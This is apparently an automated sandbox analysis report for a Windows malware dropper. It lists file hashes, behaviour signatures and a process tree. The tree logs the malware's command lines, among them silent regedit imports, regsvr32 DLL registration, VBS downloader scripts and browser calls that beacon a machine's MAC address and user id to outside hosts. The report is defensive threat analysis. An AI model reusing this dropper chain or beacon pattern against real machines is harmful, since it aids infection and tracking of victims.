Analysis
-
max time kernel
15s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
25/12/2023, 09:31
General
-
Target
148d64f2b0063fe75bca426aceb765ae.exe
-
Size
893KB
-
MD5
148d64f2b0063fe75bca426aceb765ae
-
SHA1
e0d96bd0e898b4738001559d15cf4007e959a859
-
SHA256
3f5b6dc7430bc4be4cac99270350548ca5c8a1d4ccf1c0d10233bfbf00f09b3c
-
SHA512
3f2b93db270d6b71efadebf1079635e70efe753c4b4917402c1c821707d2336144d67c954c598418b8a2c2049284b0b9b4f7b06ddf15588f6aecf0f5fcb553ef
-
SSDEEP
24576:DIrFeivrzM+h+sMNv52AXrxgEpy46RyuhLoBi:DIrdH+sMXpd9UjbhLoBi
Malware Config
Signatures
-
ASPack v2.12-2.42 2 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 6 IoCs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 5 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 43 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\148d64f2b0063fe75bca426aceb765ae.exe"C:\Users\Admin\AppData\Local\Temp\148d64f2b0063fe75bca426aceb765ae.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\notice.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\notice.exe" /S2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\budazi.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\budazi.exe" /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\dd.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\dd.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\TXFlatform.exeC:\Windows\system32\TXFlatform.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\dd.exe===4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\2011\smss.exeC:\Windows\system32\2011\smss.exe5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\kk.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\kk.exe"3⤵
-
C:\Program Files (x86)\snss.exe"C:\Program Files (x86)\snss.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\Regsvr32.exeRegsvr32.exe /s "C:\Windows\system32\Thunder.dll"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123.bat" "4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\OQ.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\OQ.exe" /S2⤵
-
C:\WINDOWS\SysWOW64\all.exe"C:\WINDOWS\system32\all.exe" /s3⤵
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\down.vbs"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tjmy.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tjmy.exe" /S2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\a1g.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\a1g.exe" /S2⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX2\bdxg.vbs"3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\TempIE.reg"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Users\Admin\AppData\Local\Temp\TempIE.reg"2⤵
- Modifies registry class
- Runs .reg file with regedit
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.budazi.com/xtj/get.asp?mac=4E55496B34AD&makedate=QM00013&comput=家庭机&ver=98&userid=00221⤵
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1876 CREDAT:17410 /prefetch:22⤵
-
-
C:\WINDOWS\SysWOW64\regedit.exeregedit /s reg.reg1⤵
- Runs .reg file with regedit
-
C:\Program Files (x86)\Internet Explorer\Iexplore.exe"C:\Program Files (x86)\Internet Explorer\Iexplore.exe" http://www.iydy.cn/tjmy.html1⤵
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://www.iydy.cn/tjmy.html2⤵
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4152 CREDAT:17410 /prefetch:21⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
178KB
MD5f71956d94027923378ebb9df38461324
SHA12139baed7921bdc798ffd1554f5fabe8baa5949b
SHA2560aaa5060d603374a46ac2c3b91047555b3c0d50ee9defc81135cd71fdf8f1e56
SHA512d6ce4178c3e77c6d8d7d9bdd3fd8401e7990f6e3bebece73221b24c9d7958704156dbcbf2d3f1c2fcd08507ea77250777a6d2ff675d3f06045ebeddfadefcb2b
-
Filesize
16KB
MD5579961d94af1601374c82ec65a5078fc
SHA1bc3b55defc1fe6d28b38ba3596f781d851af4dd7
SHA2564f9a9635687f098cdf51ac288f8aea27d90d55c67a8924aa33232f98ef606731
SHA51266cd24bba64f5fde711e7df8819783c4730cdb41bdd65c5ac4c9bb26ee93114cad147165543433226799e47444a518b7e6bc826d705b040e71333dec6ee19bc5
-
Filesize
44KB
MD501c09024c507462b1321614f6ede372d
SHA1d5a8ba3157bc9ee6a4cbb63955dbcdb4cc76403c
SHA256b71d7ede04be792374940a5b9011a5737e145113ba45c3f6cc1e5fb18b39c79a
SHA512dfe3b2b853b44e6d0f073d819bb223f209b3ed024cae074e1d5139709be83e294fcb3874d7f174af14cb8fcb0d229c37f293586de2401d68b036810f2c049a6b
-
Filesize
2KB
MD59407c7672b6715638e6c9142ddbbc42d
SHA111610ae36947b5d669da7b0165c249a44e6de2d3
SHA256ba0451385a1fd8f461e2dde71b37e9e9a353430fa20aba6d8a5a9191266181d7
SHA512de1fe3c2b09f904fb40cbc421297e81809caa2b25bac0bc13a8e5a6334dc59d4ed9cd88f3ba50a7389a73706c4e9f0dc8ad0b56a151057f775a4359faab21711
-
Filesize
17KB
MD5a199f12ed392918eef6e9834b2c20d0e
SHA1b717b647ce9be683e06b7c25a52f0682178268af
SHA2561a641daf41456fae6d21eb582e5621925cba68bb97200926d67721b068165652
SHA512b8786d0653d96e767bfb04b9c24f5a962d179e8f96ee8ca92eaf15a3f704fbbd87ebfe9614c5f895843836e1935e770ea6e6a4949fe48292233d873698a87a58
-
Filesize
72KB
-
Filesize
72KB
-
Filesize
72KB
-
Filesize
140KB
-
Filesize
140KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
140KB
-
Filesize
600KB
-
Filesize
600KB
-
Filesize
40KB
-
Filesize
40KB
-
Filesize
736KB
-
Filesize
736KB
-
Filesize
140KB
-
Filesize
140KB